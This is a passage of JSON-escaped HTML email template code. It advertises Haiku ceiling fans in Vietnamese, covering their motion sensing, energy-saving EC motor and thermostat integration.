\\u0111i\\u1ec7n h\\u00e0ng n\\u0103m l\\u00ean \\u0111\\u1ebfn 30%, gi\\u1ea3m t\\u1ea3i cho h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 nhi\\u1ec7t \\u0111\\u1ed9 \\u1edf m\\u1ee9c th\\u1ea5p nh\\u1ea5t. Kh\\u00e1ch h\\u00e0ng v\\u00e0 nh\\u00e2n vi\\u00ean c\\u1ee7a b\\u1ea1n s\\u1ebd c\\u1ea3m th\\u1ea5y tho\\u1ea3i m\\u00e1i nhi\\u1ec7t v\\u00e0 c\\u00f4ng vi\\u1ec7c s\\u1ebd hi\\u1ec7u qu\\u1ea3 h\\u01a1n<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; \\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG NH\\u00c0 \\u1ede - C\\u0102N H\\u1ed8 CHUNG C\\u01af<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596365970938-7G9GXVu.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #f4f4f4;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366368130-9kP2jpS.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>Gi\\u00e1m S\\u00e1t B\\u1eb1ng C\\u00f4ng Ngh\\u1ec7 Th\\u00f4ng Minh<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">B\\u1ea1n qu\\u00ean t\\u1eaft qu\\u1ea1t ho\\u1eb7c \\u0111\\u00e8n. C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 s\\u1eed d\\u1ee5ng c\\u1ea3m bi\\u1ebfn h\\u1ed3ng ngo\\u1ea1i th\\u1ee5 \\u0111\\u1ed9ng s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng b\\u1eadt\\/t\\u1eaft qu\\u1ea1t, \\u0111\\u00e8n khi b\\u1ea1n r\\u1eddi kh\\u1ecfi ph\\u00f2ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366402742-jV0TkYE.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>\\u0110\\u1ed9ng C\\u01a1 EC Si\\u00eau Ti\\u1ebft Ki\\u1ec7m \\u0110i\\u1ec7n<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">Thi\\u1ebft k\\u1ebf \\u0111\\u1ed9ng c\\u01a1 EC Haiku\\u00ae mang t\\u00ednh \\u0111\\u1ed9t ph\\u00e1 c\\u00f4ng ngh\\u1ec7, kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 g\\u1ea5p 4 l\\u1ea7n theo ti\\u00eau chu\\u1ea9n ENERGY START\\u00ae<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366425358-2AnQ9PF.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>K\\u1ebft N\\u1ed1i Thi\\u1ebft B\\u1ecb C\\u1ea3m Nhi\\u1ec7t Th\\u00f4ng Minh<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">Haiku gh\\u00e9p k\\u1ebft n\\u1ed1i v\\u1edbi b\\u1ed9 \\u0111i\\u1ec1u nhi\\u1ec7t Nest Learning\\u2122, Ecobee gi\\u00fap ti\\u1ebft ki\\u1ec7m t\\u1edbi 30% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m cho h\\u1ec7 \\u0111i\\u1ec1u h\\u00f2a.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #f4f4f4;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366476320-ddd.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 